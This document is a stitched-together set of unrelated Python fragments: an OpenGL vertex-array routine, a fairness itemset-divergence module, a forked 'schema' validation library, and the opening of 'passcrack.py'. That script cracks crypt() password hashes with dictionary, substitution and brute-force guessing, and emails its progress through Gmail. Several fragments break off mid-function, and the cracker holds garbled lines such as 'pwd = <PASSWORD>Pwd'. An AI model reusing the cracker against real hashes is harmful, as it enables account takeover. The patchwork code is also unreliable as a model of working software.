        glBufferData(GL_ARRAY_BUFFER, ADT.arrayByteCount(self.texts_Fan), self.texts_Fan, usage)
def set_up_vertex_array(self):
print("set_up_vertex_array")
if not self.vertex_arrays:
self.vertex_arrays = True
vert_array3 = []
vert_array4 = []
vert_array_Fan = []
vert_array_Lines = []
norm_array_Lines = []
norm_array3 = []
norm_array4 = []
norm_array_Fan = []
self.text_array3 = []
self.text_array4 = []
self.text_array_Fan = []
self.arraySize3 = 0
self.arraySize4 = 0
self.arraySize_Fan = []
self.arraySize_Lines = 0
for f in self.faces:
verts = f.verts()
normals = f.norms()
uv = f.texts()
if len(verts) == 3:
for i in range(3):
vert_array3.append(verts[i])
norm_array3.append(normals[i])
self.text_array3.append(uv[i])
self.arraySize3 += 3
elif len(verts) == 4:
for i in range(4):
vert_array4.append(verts[i])
norm_array4.append(normals[i])
self.text_array4.append(uv[i])
self.arraySize4 += 4
elif len(verts) > 4:
n = len(verts)
for i in range(n):
vert_array_Fan.append(verts[i])
norm_array_Fan.append(normals[i])
self.text_array_Fan.append(uv[i])
self.arraySize_Fan.append(n)
for | |
<gh_stars>1-10
def getItemsetMetric(freq_metrics, metric="d_fnr"):
    """Group one metric column by itemset length.

    Returns {length: {itemset: metric_value}} for every length from 0 up to
    the maximum itemset length found in *freq_metrics*.
    """
    per_itemset = freq_metrics[["itemsets", metric]].set_index("itemsets").to_dict("index")
    max_len_excl = max(freq_metrics["length"] + 1)
    return {
        size: {iset: vals[metric] for iset, vals in per_itemset.items() if size == len(iset)}
        for size in range(0, max_len_excl)
    }
def getItemsetMetrics(freq_metrics, metrics=None):
    """Group several metric columns by itemset length.

    Returns {length: {itemset: {metric: value}}} for lengths 0..max length.
    """
    # None default avoids the shared-mutable-default-argument pitfall.
    if metrics is None:
        metrics = ["d_fnr", "support"]
    d = freq_metrics[["itemsets"] + metrics].set_index("itemsets").to_dict("index")
    return {
        k: {k1: v for k1, v in d.items() if k == len(k1)}
        for k in range(0, max(freq_metrics["length"] + 1))
    }
def getLenDictionaries(dictionary, sortKey=False):
    """Split a {itemset: value} dict into {length: sub-dict} buckets.

    With sortKey=True the buckets are returned ordered by ascending length.
    """
    buckets = {}
    for key in dictionary:
        size = len(key)
        buckets[size] = {k: dictionary[k] for k in dictionary if len(k) == size}
    if sortKey:
        return dict(sorted(buckets.items(), key=lambda item: item[0]))
    return buckets
def sortItemset(x, abbreviations=None):
    """Render an itemset as a sorted, comma-separated string.

    Each (full, short) pair in *abbreviations* is substring-replaced in the
    joined label.
    """
    # None default avoids the shared-mutable-default-argument pitfall.
    if abbreviations is None:
        abbreviations = {}
    label = ", ".join(sorted(x))
    for full, short in abbreviations.items():
        label = label.replace(full, short)
    return label
def abbreviateDict(d, abbreviations):
    """Re-key a dict (e.g. Shapley values) by abbreviated string labels.

    Each itemset key becomes a singleton frozenset holding its sorted,
    abbreviated string form; values are carried over unchanged.
    """
    out = {}
    for itemset, value in d.items():
        label = sortItemset(itemset, abbreviations=abbreviations)
        out[frozenset([label])] = value
    return out
# freq_metrics.loc[freq_metrics.length==1][["itemsets", "support"]].set_index("itemsets")["support"].to_dict()
from .shapley_value_FPx import (
shapley_subset,
computeShapleyItemset,
computeDeltaDiffShap,
)
from .lattice_graph import (
getLatticeItemsetMetric,
plotLatticeGraph_colorGroups,
plotLatticeGraph_colorGroups_v1,
)
# from .utils_significance import *
# Column names used by the delta/Shapley tables.
i_col = "item i"
delta_col = "delta_item"
v_si_col = "v_S+i"
v_s_col = "v_S"
corr_coef = "corr_coef"
corr_coef_sq = "corr_coef_sq"
s_col = "S"
corr_coef_mse = "corr_coef_mse"
MSE_col = "MSE"
SSE_col = "SSE"
SE_col = "SE"
# Maps a non-"d_"-prefixed metric name to its underlying classification metric.
map_metric = {"ACsf": "accuracy", "SPsf": "accuracy", "FPsf": "fp", "FNsf": "fn"}
# For each divergence metric: which confusion-matrix cells count as the
# "T" (success/numerator) and "F" (failure) outcomes of its Beta distribution.
map_beta_distribution = {
    "d_fpr": {"T": ["fp"], "F": ["tn"]},
    "d_fnr": {"T": ["fn"], "F": ["tp"]},
    "d_accuracy": {"T": ["tp", "tn"], "F": ["fp", "fn"]},
    "d_fpr_abs": {"T": ["fp"], "F": ["tn"]},
    "d_fnr_abs": {"T": ["fn"], "F": ["tp"]},
    "d_accuracy_abs": {"T": ["tp", "tn"], "F": ["fp", "fn"]},
    "d_posr": {"T": ["tp", "fn"], "F": ["tn", "fp"]},
    "d_negr": {"T": ["tn", "fp"], "F": ["tp", "fn"]},
    # "d_classiferror": {"T": ["tp", "tn"], "F": ["fp", "fn"]},
    # "d_classiferror_abs": {"T": ["tp", "tn"], "F": ["fp", "fn"]},
    "d_error": {"T": ["fp", "fn"], "F": ["tp", "tn"]},
    "d_ppv": {"T": ["tp"], "F": ["fp"]},
    "d_tpr": {"T": ["tp"], "F": ["fn"]},
    "d_tnr": {"T": ["tn"], "F": ["fp"]},
    "d_npv": {"T": ["tn"], "F": ["fn"]},
    "d_fdr": {"T": ["fp"], "F": ["tp"]},
    "d_for": {"T": ["fn"], "F": ["tn"]},
}
# Name of the column used for visualization output.
VIZ_COL_NAME = "viz"
# TODO --> move
def _compute_t_test(df, col_mean, col_var, mean_d, var_d):
return (abs(df[col_mean] - mean_d)) / ((df[col_var] + var_d) ** 0.5)
def _compute_std_beta_distribution(FPb):
return ((FPb.a * FPb.b) / ((FPb.a + FPb.b) ** 2 * (FPb.a + FPb.b + 1))) ** (1 / 2)
def _compute_variance_beta_distribution(FPb):
return (FPb.a * FPb.b) / ((FPb.a + FPb.b) ** 2 * (FPb.a + FPb.b + 1))
def _compute_mean_beta_distribution(FPb):
return FPb.a / (FPb.a + FPb.b)
# Symbols used when rendering results in the paper's notation.
# Item name in the paper
i_name = "α"  # alternatively "i"
# Pattern or itemset name in the paper
p_name = "I"
# Name for divergence in the paper
div_name = "Δ"
class FP_Divergence:
def __init__(self, freq_metrics, metric):
self.freq_metrics = freq_metrics
self.metric = metric
self.cl_metric = (
self.metric.split("_")[1] if "_" in self.metric else map_metric[self.metric]
)
self.itemset_divergence = getItemsetMetric(freq_metrics, metric)
self.df_delta = None
self.global_shapley = None
self.corr_df = None
self.itemset_divergence_not_redundant = None
self.itemset_divergence_not_redundant_df = None
self.corr_statistics_df = None
self.deltas_statistics_df = None
self.metric_name = (
"_".join(self.metric.split("_")[1:]).upper()
if self.metric.startswith("d_")
else self.metric.replace("_", "\\_")
)
self.t_value_col = (
f"t_value_{'_'.join(map_beta_distribution[self.metric]['T'])}"
if self.metric in map_beta_distribution
else None
)
self.corrSignif = None
def getItemsetDivergence(self, itemsetI):
itemsetI = frozenset(itemsetI) if type(itemsetI) == list else itemsetI
return self.itemset_divergence[len(itemsetI)][itemsetI]
def getKVItemsetsDivergence(self):
return (
self.freq_metrics[["itemsets", self.metric]]
.set_index("itemsets")[self.metric]
.to_dict()
)
def getTvalues(self):
if self.t_value_col not in self.freq_metrics.columns:
self.t_test(ret=False)
return (
self.freq_metrics[["itemsets", self.t_value_col]]
.set_index("itemsets")
.to_dict()[self.t_value_col]
)
    def plotLatticeItemset_v1(
        self,
        itemset,
        sizeDot="",
        Th_divergence=None,
        getLower=False,
        getAllGreaterTh=False,
        useMarker=True,
        show=False,
    ):
        """Plot the subset lattice of *itemset*, colour-coding nodes by divergence.

        itemset -- top itemset whose subset lattice is drawn
        Th_divergence -- when set, nodes with |divergence| >= threshold are
            put in the "greater" colour group (and noted in the title)
        getLower -- also highlight the "lower" nodes returned by the lattice helper
        getAllGreaterTh -- additionally mark minimal passing nodes ("all_greater")
        sizeDot/useMarker/show -- presentation options forwarded to the plotter
        Returns the figure produced by plotLatticeGraph_colorGroups_v1.
        """
        nameTitle = f"Metric: {self.metric}"
        info_lattice = getLatticeItemsetMetric(
            itemset, self.itemset_divergence, getLower=getLower
        )
        color_groups = {}
        nodes = info_lattice["itemset_metric"]
        # Save info node - parent source
        # node_sources={}
        if Th_divergence is not None:
            nameTitle = f"{nameTitle} - Threshold: {Th_divergence}"
            color_groups["greater"] = [
                k for k, v in nodes.items() if abs(v) >= Th_divergence
            ]
        if getLower:
            nameTitle = f"{nameTitle} - show lower"
            color_groups["lower"] = info_lattice["lower"]
        if getAllGreaterTh and Th_divergence is not None:
            color_groups["all_greater"] = []
            # Keep only minimal passing nodes: a node is skipped when a kept
            # subset already covers it, or when one of its supersets falls
            # below the threshold.
            for node in [
                k for k, v in nodes.items() if abs(v) >= Th_divergence
            ]:  # color_groups["greater"]:
                if [p for p in color_groups["all_greater"] if p.issubset(node)] == []:
                    if [
                        k
                        for k, v in nodes.items()
                        if abs(v) < Th_divergence and node.issubset(k)
                    ] == []:
                        color_groups["all_greater"].append(node)
                    # Save info node - parent source
                    # else:
                    #     node_sources[node]=[p for p in color_groups["all_greater"] if p.issubset(node)]
        # Every node not claimed by a special group is rendered as "normal".
        color_groups["normal"] = list(
            set(nodes) - set([v for v1 in color_groups.values() for v in v1])
        )
        color_map = {
            "normal": "#6175c1",
            "lower": "lightblue",
            "greater": "#ff6666",
            "all_greater": "#580023",
        }
        return plotLatticeGraph_colorGroups_v1(
            info_lattice["lattice_graph"],
            info_lattice["itemset_metric"],
            color_groups,
            annotation_F=True,
            metric=nameTitle,
            sizeDot=sizeDot,
            color_map=color_map,
            useMarker=useMarker,
            show=show,
        )
        # else:
        #     plotLatticeGraph(info_lattice["lattice_graph"], info_lattice["itemset_metric"], metric=f"Metric: {self.metric}", annotation_F=True, sizeDot=sizeDot)#, Th_divergence=0.1)
# TODO: getLower to showCorrective
    def plotLatticeItemset(
        self,
        itemset,
        Th_divergence=None,
        getLower=False,
        getAllGreaterTh=False,
        **kwargs,
    ):
        """Plot the subset lattice of *itemset*, colour-coding nodes by divergence.

        Same grouping logic as plotLatticeItemset_v1, but forwards any extra
        presentation options to plotLatticeGraph_colorGroups via **kwargs.
        """
        nameTitle = f"Metric: {self.metric}"
        info_lattice = getLatticeItemsetMetric(
            itemset, self.itemset_divergence, getLower=getLower
        )
        color_groups = {}
        nodes = info_lattice["itemset_metric"]
        if Th_divergence is not None:
            nameTitle = f"{nameTitle} - Threshold: {Th_divergence}"
            color_groups["greater"] = [
                k for k, v in nodes.items() if abs(v) >= Th_divergence
            ]
        if getLower:
            nameTitle = f"{nameTitle} - show lower"
            color_groups["lower"] = info_lattice["lower"]
        if getAllGreaterTh and Th_divergence is not None:
            color_groups["all_greater"] = []
            # Keep only minimal passing nodes: no kept subset and no superset
            # below the threshold.
            for node in [
                k for k, v in nodes.items() if abs(v) >= Th_divergence
            ]:  # color_groups["greater"]:
                if [p for p in color_groups["all_greater"] if p.issubset(node)] == []:
                    if [
                        k
                        for k, v in nodes.items()
                        if abs(v) < Th_divergence and node.issubset(k)
                    ] == []:
                        color_groups["all_greater"].append(node)
        # Every node not claimed by a special group is rendered as "normal".
        color_groups["normal"] = list(
            set(nodes) - set([v for v1 in color_groups.values() for v in v1])
        )
        color_map = {
            "normal": "#6175c1",
            "lower": "lightblue",
            "greater": "#ff6666",
            "all_greater": "#580023",
        }
        return plotLatticeGraph_colorGroups(
            info_lattice["lattice_graph"],
            info_lattice["itemset_metric"],
            color_groups,
            metric=nameTitle,
            color_map=color_map,
            **kwargs,
        )
def getFItemsetsDivergence(self, redundant=True):
if redundant:
return self.itemset_divergence
else:
if self.itemset_divergence_not_redundant is not None:
return self.itemset_divergence_not_redundant
return self.getFItemsetsDivergenceNotRedundant(lenFormat=True)
def getFItemsetsDivergenceNotRedundant(self, lenFormat=False):
if self.itemset_divergence_not_redundant is not None:
return self.itemset_divergence_not_redundant
itemset_divergence_not_redundant_df = (
self.getFItemsetsDivergenceDfNotRedundant()
)
itemset_divergence_not_redundant = (
itemset_divergence_not_redundant_df.set_index("itemsets").T.to_dict("int")[
self.metric
]
)
self.itemset_divergence_not_redundant = getLenDictionaries(
itemset_divergence_not_redundant
)
return (
self.itemset_divergence_not_redundant
if lenFormat
else itemset_divergence_not_redundant
)
    def getFItemsetsDivergenceDfNotRedundant(self):
        """DataFrame of itemsets with redundant patterns removed, sorted by
        descending divergence; cached after the first call.

        An itemset is redundant when another itemset with the SAME divergence
        value is one of its subsets (the shorter pattern already explains it).
        """
        def removeRedundant(df, a):
            # Applied per divergence-value group: keep only itemsets that have
            # no earlier (shorter, due to pre-sorting) subset in the group.
            import pandas as pd
            grouped_itemset = list(df.itemsets.values)
            d = pd.DataFrame(
                {
                    "itemsets": [
                        grouped_itemset[i]
                        for i in range(0, len(grouped_itemset))
                        if len(
                            [
                                k
                                for k in grouped_itemset[0:i]
                                if k.issubset(grouped_itemset[i])
                            ]
                        )
                        == 0
                    ]
                }
            )
            d[a] = df.name
            return d
        if self.itemset_divergence_not_redundant_df is not None:
            return self.itemset_divergence_not_redundant_df
        # Sort by divergence (desc) then length (asc) so that, inside each
        # divergence group, subsets come before their supersets.
        dfs = self.freq_metrics.sort_values(
            [self.metric, "length"], ascending=[False, True]
        )[["itemsets", self.metric]]
        dfs_g = dfs.copy()
        # groupby drops NaN keys, so NaN divergences are temporarily replaced
        # with the sentinel string "NaN" and restored after grouping.
        dfs_g.loc[dfs_g.loc[dfs_g[self.metric].isnull()].index, self.metric] = "NaN"
        grouped = dfs_g.groupby(self.metric, group_keys=False).apply(
            removeRedundant, self.metric
        )
        import math
        grouped = grouped.replace({self.metric: "NaN"}, float("NaN"))
        not_red = grouped.sort_values(self.metric, ascending=False).reset_index(
            drop=True
        )
        self.itemset_divergence_not_redundant_df = not_red
        return self.itemset_divergence_not_redundant_df
def getDivergenceMetricNotRedundant(self, th_redundancy=0, sortV=True):
if th_redundancy is None:
return self.freq_metrics
df_corr = self.getDfDeltaShapleyValue()
redundant = df_corr.loc[abs(df_corr.delta_item) <= th_redundancy]
redundant_itemsets = set(redundant["S+i"].values)
# freq_metric_Red=self.freq_metrics.loc[self.freq_metrics.itemsets.isin(redundant_itemsets)]
freq_metric_NotRed = self.freq_metrics.loc[
self.freq_metrics.itemsets.isin(redundant_itemsets) == False
]
if sortV:
return freq_metric_NotRed.sort_values(
[self.metric, self.cl_metric], ascending=False
)
else:
return freq_metric_NotRed
def getRedundantMarginalContribution(self, th_redundancy=0):
df_corr = self.getDfDeltaShapleyValue()
return df_corr.loc[abs(df_corr.delta_item) <= th_redundancy]
def getInfoItemset(self, itemset):
if type(itemset) == list:
itemset = frozenset(itemset)
return self.freq_metrics.loc[self.freq_metrics.itemsets == itemset]
def getInfoItemsets(self, list_itemsets):
if type(list_itemsets[0]) == list:
list_itemsets = [frozenset(itemset) for itemset in list_itemsets]
return self.freq_metrics.loc[
self.freq_metrics.itemsets.apply(lambda x: x in list_itemsets)
]
def getFMetricGreaterTh(
self, T_thr=0.1, lenFormat=False, absValue=True, sortedV=False
):
if absValue:
greaterT = {
k2: v2
for k, v in self.itemset_divergence.items()
for k2, v2 in v.items()
if abs(v2) >= T_thr
}
else:
greaterT = {
k2: v2
for k, v in self.itemset_divergence.items()
for k2, v2 in v.items()
if v2 > T_thr
}
if sortedV:
greaterT = {
k: v
for k, v in sorted(
greaterT.items(), key=lambda item: item[1], reverse=True
)
}
return getLenDictionaries(greaterT) if lenFormat else greaterT
    def getDivergenceTopK(self, K=10, lenFormat=False, th_redundancy=None, absF=False):
        """Return the K itemsets with the highest divergence.

        :param K: number of itemsets to return
        :param lenFormat: if True return the length-keyed dictionary format
        :param th_redundancy: if not None, first filter out itemsets whose
            marginal contribution is within this threshold
        :param absF: rank by absolute metric value instead of signed value
        :return: dict mapping itemset -> metric value
        """
        # item_s_flat={k2: v for k in self.itemset_divergence for k2, v in self.itemset_divergence[k].items()}
        # topK={k: v for k, v in sorted(item_s_flat.items(), key=lambda item: item[1], reverse=True)[:K]}
        scores = (
            self.freq_metrics[["itemsets", self.metric, self.cl_metric]]
            if th_redundancy is None
            else self.getDivergenceMetricNotRedundant(th_redundancy=th_redundancy)
        )
        if absF:
            # Rank by |metric|, descending.
            topKDF = scores.iloc[scores[self.metric].abs().argsort()[::-1]][
                ["itemsets", self.metric]
            ].head(K)
        else:
            topKDF = scores.sort_values([self.metric, self.cl_metric], ascending=False)[
                ["itemsets", self.metric]
            ].head(K)
        topK = topKDF.set_index("itemsets").to_dict()[self.metric]
        return getLenDictionaries(topK) if lenFormat else topK
def getDivergenceTopKDf(self, K=10, th_redundancy=None, absF=False):
# item_s_flat={k2: v for k in self.itemset_divergence for k2, v in self.itemset_divergence[k].items()}
# topK={k: v for k, v in sorted(item_s_flat.items(), key=lambda item: item[1], reverse=True)[:K]}
# OK:scores=self.freq_metrics if redundant else self.getFItemsetsDivergenceDfNotRedundant()
| |
"""
Schema is a library for validating Python data structures, such as those
obtained from config-files, forms, external services or command-line
parsing, converted from JSON/YAML (or something else) to Python data-types.
NOTE: This is a fixed fork of: https://github.com/keleshev/schema
"""
import re
import os
__all__ = ['Schema',
'And', 'Or', 'Regex', 'Optional', 'Use', 'Forbidden', 'Const',
'SchemaError',
'SchemaWrongKeyError',
'SchemaMissingKeyError',
'SchemaForbiddenKeyError',
'SchemaUnexpectedTypeError']
class SchemaError(Exception):
    """
    Error during Schema validation.
    """
    def __init__(self, autos, errors=None):
        # Normalise both arguments to lists so `code` can iterate them.
        if isinstance(autos, list):
            self.autos = autos
        else:
            self.autos = [autos]
        if isinstance(errors, list):
            self.errors = errors
        else:
            self.errors = [errors]
        Exception.__init__(self, self.code)
    @staticmethod
    def uniq(seq):
        """
        Remove duplicates from *seq* while preserving order.
        :param seq: sequence to examine
        :return: deduplicated list
        """
        seen = set()
        result = []
        for element in seq:
            if element not in seen:
                seen.add(element)
                result.append(element)
        return result
    @property
    def code(self):
        """
        Build the display string: the deduplicated explicit error messages
        if any were given, otherwise the deduplicated automatic messages.
        :return: string for error display
        """
        data_set = self.uniq(item for item in self.autos if item is not None)
        error_list = self.uniq(item for item in self.errors if item is not None)
        return os.linesep.join(error_list if error_list else data_set)
class SchemaWrongKeyError(SchemaError):
    """
    Error should be raised when an unexpected key is detected within the
    data set being validated.
    """
class SchemaMissingKeyError(SchemaError):
    """
    Error should be raised when a mandatory key is not found within the
    data set being validated.
    """
class SchemaForbiddenKeyError(SchemaError):
    """
    Error should be raised when a forbidden key is found within the
    data set being validated, and its value matches the value that was specified.
    """
class SchemaUnexpectedTypeError(SchemaError):
    """
    Error should be raised when a type mismatch is detected within the
    data set being validated.
    """
class And(object):
    """
    Utility function to combine validation directives in AND Boolean fashion.
    """
    def __init__(self, *args, **kw):
        self._args = args
        assert set(kw).issubset(['error', 'schema', 'ignore_extra_keys'])
        self._error = kw.get('error')
        self._ignore_extra_keys = kw.get('ignore_extra_keys', False)
        # You can pass your inherited Schema class.
        self._schema = kw.get('schema', Schema)
    def __repr__(self):
        rendered_args = ', '.join(repr(a) for a in self._args)
        return '%s(%s)' % (self.__class__.__name__, rendered_args)
    def validate(self, data):
        """
        Validate data against every sub-schema in turn; each schema sees
        the (possibly transformed) output of the previous one.
        :param data: to be validated with sub defined schemas.
        :return: returns validated data
        """
        for sub_schema in self._args:
            wrapped = self._schema(sub_schema, error=self._error,
                                   ignore_extra_keys=self._ignore_extra_keys)
            data = wrapped.validate(data)
        return data
class Or(And):
    """
    Utility function to combine validation directives in a OR Boolean
    fashion.
    """
    def validate(self, data):
        """
        Validate data against the sub-schemas, returning the result of the
        first one that accepts the data.
        :param data: data to be validated by provided schema.
        :raises SchemaError: when no sub-schema validates the data.
        :return: the validated (possibly transformed) data
        """
        autos, errors = [], []
        for sub_schema in self._args:
            candidate = self._schema(sub_schema, error=self._error,
                                     ignore_extra_keys=self._ignore_extra_keys)
            try:
                return candidate.validate(data)
            except SchemaError as exc:
                # Remember the most recent failure for the final report.
                autos, errors = exc.autos, exc.errors
        raise SchemaError(['Did not validate %r' % data] + autos,
                          [self._error.format(data) if self._error else None] + errors)
class Regex(object):
"""
Enables schema.py to validate string using regular expressions.
"""
# Map all flags bits to a more readable description
NAMES = ['re.ASCII', 're.DEBUG', 're.VERBOSE', 're.UNICODE', 're.DOTALL',
're.MULTILINE', 're.LOCALE', 're.IGNORECASE', 're.TEMPLATE']
def __init__(self, pattern_str, flags=0, error=None):
self._pattern_str = pattern_str
flags_list = [Regex.NAMES[i] for i, f in # Name for each bit
enumerate('{0:09b}'.format(flags)) if f != '0']
if flags_list:
self._flags_names = ', flags=' + '|'.join(flags_list)
else:
self._flags_names = ''
self._pattern = re.compile(pattern_str, flags=flags)
self._error = error
def __repr__(self):
return '%s(%r%s)' % (self.__class__.__name__, self._pattern_str, self._flags_names)
def validate(self, data):
"""
Validated data using defined regex.
:param data: data to be validated
:raises SchemaError: when data does not match
:return: return validated data.
"""
err = self._error
try:
if self._pattern.search(data):
ret = data
else:
raise SchemaError('%r does not match %r' % (self, data), err)
except TypeError:
raise SchemaError('%r is not string nor buffer' % data, err)
return ret
class Use(object):
    """
    For more general use cases, you can use the Use class to transform
    the data while it is being validated.
    """
    def __init__(self, callable_, error=None):
        assert callable(callable_)
        self._callable = callable_
        self._error = error
    def __repr__(self):
        return '%s(%r)' % (self.__class__.__name__, self._callable)
    def validate(self, data):
        """
        Apply the wrapped callable to *data* and return its result.
        :param data: data to validate
        :raises SchemaError: when the wrapped callable raises
        :return: Validation result
        """
        error_text = self._error
        try:
            return self._callable(data)
        except SchemaError as exc:
            formatted = error_text.format(data) if error_text else None
            raise SchemaError([None] + exc.autos, [formatted] + exc.errors)
        except BaseException as exc:
            formatted = error_text.format(data) if error_text else None
            raise SchemaError('%s(%r) raised %r' % (_callable_str(self._callable), data, exc),
                              formatted)
# Priority buckets, ordered from the weakest schema kind (a plain
# comparable value) up to the most specific (an iterable of sub-schemas).
COMPARABLE, CALLABLE, VALIDATOR, TYPE, DICT, ITERABLE = range(6)
def get_object_priority(obj):
    """
    Return priority for a given object.
    The checks are ordered from most to least specific: e.g. a dict is
    also iterable-ish and a type is also callable, so order matters.
    :param obj: Object to prioritise
    :return: type of the priority
    """
    if isinstance(obj, (list, tuple, set, frozenset)):
        return ITERABLE
    if isinstance(obj, dict):
        return DICT
    if issubclass(type(obj), type):
        return TYPE
    if hasattr(obj, 'validate'):
        return VALIDATOR
    if callable(obj):
        return CALLABLE
    return COMPARABLE
class Schema(object):
"""
Entry point of the library, use this class to instantiate validation
schema for the data that will be validated.
"""
    def __init__(self, schema, error=None, ignore_extra_keys=False):
        """
        :param schema: schema specification (type, dict, iterable, callable or value)
        :param error: custom error message template for validation failures
        :param ignore_extra_keys: if True, dict validation drops unknown keys
        """
        self._schema = schema
        self._error = error
        self._ignore_extra_keys = ignore_extra_keys
    @property
    def scheme(self):
        """
        Get the wrapped schema specification (as passed to __init__).
        :return: the raw schema object
        """
        return self._schema
    def __repr__(self):
        # e.g. Schema({'key': <class 'int'>})
        return '%s(%r)' % (self.__class__.__name__, self._schema)
@staticmethod
def _dict_key_priority(d_key):
"""
Return priority for a given key object.
:param d_key: dictionary
:return: prioritised dictionary
"""
if isinstance(d_key, Forbidden):
ret = get_object_priority(d_key.scheme) - 0.5
elif isinstance(d_key, Optional):
ret = get_object_priority(d_key.scheme) + 0.5
else:
ret = get_object_priority(d_key)
return ret
def is_valid(self, data):
"""
Return whether the given data has passed all the validations
that were specified in the given schema.
:param data: examined object
:return: bool
"""
try:
self.validate(data)
except SchemaError:
ret = False
else:
ret = True
return ret
def validate(self, data):
"""
Validate schema.
:param data: examined object
:raises SchemaUnexpectedTypeError: when type mismatch
:raises SchemaWrongKeyError: when key is wrong
:raises SchemaForbiddenKeyError: when key is forbidden
:raises SchemaMissingKeyError: when key is missing
:raises SchemaError: when schema do not validate
:return: validation result
"""
# pylint: disable=R0914,R1702,R1705,R0912,R0915,R0911
schema_class = self.__class__
schema_data = self._schema
err_set = self._error
ign_ex_keys = self._ignore_extra_keys
flavor = get_object_priority(schema_data)
if flavor == ITERABLE:
data = schema_class(type(schema_data), error=err_set).validate(data)
or_stat = Or(*schema_data, error=err_set, schema=schema_class, ignore_extra_keys=ign_ex_keys)
return type(data)(or_stat.validate(d) for d in data)
if flavor == DICT:
data = schema_class(dict, error=err_set).validate(data)
new = type(data)() # new - is a dict of the validated values
coverage = set() # matched schema keys
# for each key and value find a schema entry matching them, if any
sorted_skeys = sorted(schema_data, key=self._dict_key_priority)
for key, value in data.items():
for skey in sorted_skeys:
svalue = schema_data[skey]
try:
nkey = schema_class(skey, error=err_set).validate(key)
except SchemaError:
pass
else:
if isinstance(skey, Forbidden):
# As the content of the value makes little sense for
# forbidden keys, we reverse its meaning:
# we will only raise the SchemaErrorForbiddenKey
# exception if the value does match, allowing for
# excluding a key only if its value has a certain type,
# and allowing Forbidden to work well in combination
# with Optional.
try:
nvalue = schema_class(svalue, error=err_set).validate(value)
except SchemaError:
continue
raise SchemaForbiddenKeyError('Forbidden key encountered: %r in %r' % (nkey, data), err_set)
else:
try:
nvalue = schema_class(svalue, error=err_set,
ignore_extra_keys=ign_ex_keys).validate(value)
except SchemaError as exc:
msg = "Schema key '%s' error:" % nkey
raise SchemaError([msg] + exc.autos, [err_set] + exc.errors)
else:
new[nkey] = nvalue
coverage.add(skey)
break
required = set(obj for obj in schema_data if not isinstance(obj, (Optional, Forbidden)))
if not required.issubset(coverage):
missing_keys = required - coverage
s_missing_keys = ', '.join(repr(key) for key in sorted(missing_keys, key=repr))
raise SchemaMissingKeyError('Missing options: ' + s_missing_keys, err_set)
if not self._ignore_extra_keys and (len(new) != len(data)):
wrong_keys = set(data.keys()) - set(new.keys())
s_wrong_keys = ', '.join(repr(key) for key in sorted(wrong_keys, key=repr))
raise SchemaWrongKeyError('Unexpected option %s in %r' % (s_wrong_keys, data),
err_set.format(data) if err_set else None)
# Apply default-having optionals that haven't been used:
defaults = set(key for key in schema_data if isinstance(key, Optional)
and hasattr(key, 'default')) - coverage
for default in defaults:
new[default.key] = default.default
return new
if flavor == TYPE:
if isinstance(data, schema_data):
return data
else:
raise SchemaUnexpectedTypeError('%r should be type of %r' % (data, schema_data.__name__),
err_set.format(data) if err_set else | |
<filename>passcrack.py<gh_stars>0
# Simple email script meant for a gmail sender
def sendEmail(fromGmail, fromPwd, toEmails, subject, body):
# Import smtp library
import smtplib
# Initialize vars
usr = fromGmail
pwd = <PASSWORD>Pwd
FROM = usr
TO = toEmails if type(toEmails) is list else [toEmails]
SUBJECT = subject
TEXT = body
# Prepare and attempt to send email message
message = """\From: %s\nTo: %s\nSubject: %s\n\n%s
""" % (FROM, ", ".join(TO), SUBJECT, TEXT)
try:
server = smtplib.SMTP("smtp.gmail.com", 587)
server.ehlo()
server.starttls()
server.login(usr, pwd)
server.sendmail(FROM, TO, message)
server.close()
print "Successfully sent the email"
except:
print "Failed to send the email"
# Capitalize every other letter in a string
# idx == 0 -> start with first letter, idx == 1 -> start with second letter
def capEveryOther(word, idx):
    """Return word with every other letter upper-cased.

    Positions where (position + idx) is even are upper-cased; the
    remaining positions are lower-cased.
    """
    chars = []
    for position, ch in enumerate(word):
        if (position + idx) % 2 == 0:
            chars.append(ch.upper())
        else:
            chars.append(ch.lower())
    return "".join(chars)
# Perform character-to-number/symbol substitution
def charSubst(word, old, new):
    """Replace both the lower- and upper-case forms of old with new."""
    return word.replace(old.lower(), new).replace(old.upper(), new)
# Password cracking script
import sys
import time
import crypt
from itertools import product
if len(sys.argv) != 5:
print "Usage: {} dictionary.txt alg salt hash".format(sys.argv[0])
else:
# Read in arguments
dct = str(sys.argv[1])
alg = str(sys.argv[2])
slt = str(sys.argv[3])
hsh = str(sys.argv[4])
# Declare variables
startTime = time.time()
MAX_LEVEL = 6
hashFound = False
hashGuess = ""
passGuess = ""
formattedSalt = ""
temp = ""
entryPerms = []
level = 1
i = -1
j = 0
alg = int(alg)
levelOneT = 0
levelTwoT = 0
levelThreeT = 0
levelFourT = 0
levelFiveT = 0
emailTimeStr = ""
numSubChars = ["l", "e", "a", "s", "b", "t", "o"]
symSubChars = ["i", "a", "v", "s", "c"]
specChars = ["!", "@", "#", "$", "%", "^", "&", "*", "(", ")", "+", "=", ",", "/", "\\", "?", "'", "<", ">", ";", ":", "~", "[", "]", "{", "}", "|"]
bruteChars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_.,!?@#$%^&*()=+'\"/\;:[]{}|`~<> "
# Create a formatted salt based on the input
# If alg does not equal 1, 5, or 6, assumed to be DES
if alg == 1 or alg == 5 or alg == 6:
formattedSalt = "$" + str(alg) + "$" + str(slt) + "$"
else:
formattedSalt = str(slt)
alg = 0
levelOneF = "level-one-" + str(alg) + ".txt"
levelTwoF = "level-two-" + str(alg) + ".txt"
levelThreeF = "level-three-" + str(alg) + ".txt"
levelFourF = "level-four-" + str(alg) + ".txt"
refFile = open(dct, "r")
modFile = open(levelOneF, "w")
print "Time elapsed (in seconds) for:\n"
emailTimeStr += "Time elapsed (in seconds) for:\n"
# Perform password guessing logic based on dictionary entries, substitutions, and other various methods
while hashGuess != hsh:
line = refFile.readline()
if line == "":
level += 1
if refFile is not None:
refFile.close()
if modFile is not None:
modFile.close()
if level == 2:
refFile = open(levelOneF, "r")
modFile = open(levelTwoF, "w")
levelOneT = time.time()
print "Level x: {} \n".format(levelOneT - startTime)
emailTimeStr += "Level 1: {} \n".format(levelOneT - startTime)
elif level == 3:
refFile = open(levelTwoF, "r")
modFile = open(levelThreeF, "w")
levelTwoT = time.time()
print "Level 2: {} \n".format(levelTwoT - levelOneT)
emailTimeStr += "Level 2: {} \n".format(levelTwoT - levelOneT)
elif level == 4:
refFile = open(levelThreeF, "r")
modFile = open(levelFourF, "w")
levelThreeT = time.time()
print "Level 3: {} \n".format(levelThreeT - levelTwoT)
